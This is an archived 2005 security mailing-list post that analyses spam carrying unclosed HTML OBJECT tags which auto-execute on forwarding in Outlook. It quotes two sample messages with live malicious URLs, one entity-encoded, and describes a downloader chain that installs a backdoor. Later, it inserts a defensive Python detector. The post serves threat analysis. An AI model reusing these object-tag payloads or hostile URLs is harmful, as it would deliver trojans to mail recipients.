[Intrusions] Hostile object tags in spam

James C Slora Jr Jim.Slora at phra.com
Wed Jan 12 23:37:45 GMT 2005


Hostile object tags in spam are making an appearance again. We had a break
for a few months.

There is no closing </OBJECT>, so they will auto-execute when forwarded by
people using Word as their Outlook editor. This happens without warning, and
regardless of service pack level or zone settings. I have not found any AV
to trigger on this exploit (not that I expect them to alert on an unclosed
tag).
http://secunia.com/advisories/12041/

=============
TYPE 1 (live)
=============
One batch used OBJECT data in a multipart message. The object tag appears in
both the plain text section and the HTML section.

Hostile site:
http://www.alobhyundajacoupe.com/scr/page.php
That hostile page is currently live. It returns page.hta, which gets
detected as a generic Download.Trojan by Symantec. It is an HTA exploit in
encoded VBScript, a variation of the Zerolin (aka Inor, etc) trojan
downloader. Once decoded, Symantec fails to detect the script as Zerolin,
but everyone else on Virustotal detects it as Zerolin. The HTA page writes
c:\x.exe to the hard disk from embedded Hex code and executes it to download
key.exe, detected by Symantec as Backdoor.Daemonize, documented as a proxy
trojan.

I have files if anyone is interested, but nothing looks new except that
VBScript.Encoded Zerolin is on a web page instead of in the actual spammed
message.

=============
TYPE 2 (dead) - Example
=============
Another batch used OBJECT embed rather than OBJECT data and encoded the URL.
Hostile site:
&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#104;&#111;&#
115;&#116;&#105;&#110;&#103;&#97;&#110;&#105;&#109;&#101;&#46;&#99;&#111;&#1
09;&#47;&#107;&#98;&#97;&#114;&#47;

Which decodes to:
http://www.hostinganime.com/kbar

That page was dead to me when I checked - hostinganime must have taken care
of it already.
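As an added illustration (not code from the original post or from any AV vendor), the following Python checker walks a MIME message and flags OBJECT tags of both types described above: the Type 1 unclosed `object data=` tag carried in text/plain and text/html parts, and the Type 2 `object embed=` whose URL is hidden as HTML numeric character references. The sample messages, domains and headers are constructed for the example; the decoder joins the mail-wrapped `&#` fragments before unescaping, because the wrapping seen above splits a reference across two lines, and the tag regex tolerates a missing leading `<`, as the quoted samples show it.

```python
"""Flag OBJECT data/embed tags in MIME mail and decode entity-obfuscated URLs.

Added example for the post above; not the list's or any vendor's code.
"""
import email
import html
import re
from email import policy

# OBJECT tag with a data= or embed= attribute. The leading '<' is optional
# because the quoted samples lack it; the quoted value may span wrapped lines.
OBJECT_RE = re.compile(
    r'<?\s*object\b[^>]*?\b(data|embed)\s*=\s*"([^"]*)"',
    re.IGNORECASE | re.DOTALL,
)


def decode_entity_url(raw):
    """Decode &#NNN; references, first re-joining fragments split by mail
    line wrapping (e.g. '&#' at end of one line, '115;' at the start of the next)."""
    joined = re.sub(r'\s+', '', raw)
    return html.unescape(joined)


def find_object_tags(raw_message):
    """Return one finding per OBJECT data/embed tag found in any text part.

    Each finding records the MIME part type, the attribute used, the decoded
    URL, whether the URL was entity-obfuscated, and whether a closing
    </OBJECT> follows the tag in that part (the post notes the tags are unclosed).
    """
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() != 'text':
            continue
        body = part.get_content()
        for match in OBJECT_RE.finditer(body):
            attr, value = match.group(1).lower(), match.group(2)
            url = decode_entity_url(value)
            closed = re.search(r'</object>', body[match.end():],
                               re.IGNORECASE) is not None
            findings.append({
                'part': part.get_content_type(),
                'attr': attr,
                'url': url,
                'obfuscated': url != value,
                'closed': closed,
            })
    return findings


# Constructed Type 1 sample: multipart/alternative, unclosed object data= tag
# repeated in the plain text and HTML parts (domain is a placeholder).
TYPE1_SAMPLE = """\
From: sender@example.com
To: george@example.org
Subject: Hello George
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="boundary42"

--boundary42
Content-Type: text/plain; charset=us-ascii

object data="http://www.example.com/scr/page.php">Hi George,<br>
Great work with the photo.
--boundary42
Content-Type: text/html; charset=us-ascii

object data="http://www.example.com/scr/page.php">Hi George,<br>
Great work with the photo.
--boundary42--
"""

# Constructed Type 2 sample: text/plain with an object embed= whose URL is
# numeric entities for http://www.example.com/kbar/, wrapped mid-reference.
TYPE2_SAMPLE = """\
From: sender@example.com
To: someone@example.org
Subject: constructed sample
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"

Body text here.

object embed="
&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#101;&#120;&#97;&#109;&#
112;&#108;&#101;&#46;&#99;&#111;&#109;&#47;&#107;&#98;&#97;&#114;&#47;">
"""

if __name__ == '__main__':
    for sample in (TYPE1_SAMPLE, TYPE2_SAMPLE):
        for finding in find_object_tags(sample):
            print(finding)
```

Running the script prints one finding per tag; a mail gateway rule built on the same idea would quarantine any text part where `find_object_tags` returns a finding with `closed` false or `obfuscated` true, regardless of what the decoded URL is.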

=============
TYPE 1 (live)- Example
=============
Subject: Hello George
Received: from dialup1-213.134.2.202.keystone.hu
(dialup1-213.134.2.202.keystone.hu [213.134.2.202])
Message-ID: <55684281984472.21302.qmail at web41296.mail.yahoo.com>
Received: from [213.134.2.202] by web41296.mail.yahoo.com via HTTP; Wed, 12
Jan 2005 12:57:33 -0600
Date: Wed, 12 Jan 2005 12:57:33 -0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="0-4555602865-4593356873=:15474"

--0-4555602865-4593356873=:15474
Content-Type: text/plain; charset=us-ascii

object data="http://www.alobhyundajacoupe.com/scr/page.php">Hi George,<br>
Great work with the photo. I agree with you, I've been trying out new
photoshop techniques since I joined a month ago... It's very addictive and I
have so much more to learn!
<br>Regards,<br>
Allen Eaton
--0-4555602865-4593356873=:15474
Content-Type: text/html; charset=us-ascii

object data="http://www.alobhyundajacoupe.com/scr/page.php">Hi George,<br>
Great work with the photo. I agree with you, I've been trying out new
photoshop techniques since I joined a month ago... It's very addictive and I
have so much more to learn!
<br>Regards,<br>
Allen Eaton
--0-4555602865-4593356873=:15474--

=============
TYPE 2 (dead) - Example
=============
Subject: M1crOsOft Update Alert
Received: from 200216007183.user.veloxzone.com.br
(200216007183.user.veloxzone.com.br [200.216.7.183])
Received: from polariton.dx.net ([64.75.1.104])
          by affectation.freeaccess.nl
          (InterMail vK.4.04.00.03 172-937-413-20031559 license
2yi625wd9554v9ac4z4kqi5221p6neb9)
          with SMTP
          id <20046162601581.BZZI2351.affectation at polariton.dx.net>
          for <sharp at phra.com>; Wed, 12 Jan 2005 04:32:14 +0500
Received: from www.dx.net (66.150.161.133)
	by polariton.dx.net (RS ver 1.0.92vs) with SMTP id 3-26c040750670
	for <sharp at phra.com>; Wed, 12 Jan 2005 01:27:14 +0200 (EDT)
Date: Tue, 11 Jan 2005 22:32:14 -0100
Message-ID: <866773436577.ELQ32819 at recession.freeaccess.nl>
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 7Bit

Stop paying full pr!ce for your software

W!ndows X.P Pr0fessional + Office X*P PrOfessional for as low as 8o$

get it quickly:  http://armageddon.win-xp-oem.biz/

The offer is valid till january  22th
stock is limited





please reply

Royal Benoit
Miller
world of health biotech co.,ltd, 10035, China
Phone: 171-164-9811
Mobile: 213-419-1411
Email: rsqlg at dragoncon.net

This is a confirmation message

This download is a 70 hour complementary shareware

NOTES:
The contents of this reply is for your exclusive use and should not be
periodic bimodal

stayed stonewort glycerine

Time: Tue, 11 Jan 2005 18:34:14 -0500
object embed="
&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#104;&#111;&#
115;&#116;&#105;&#110;&#103;&#97;&#110;&#105;&#109;&#101;&#46;&#99;&#111;&#1
09;&#47;&#107;&#98;&#97;&#114;&#47;">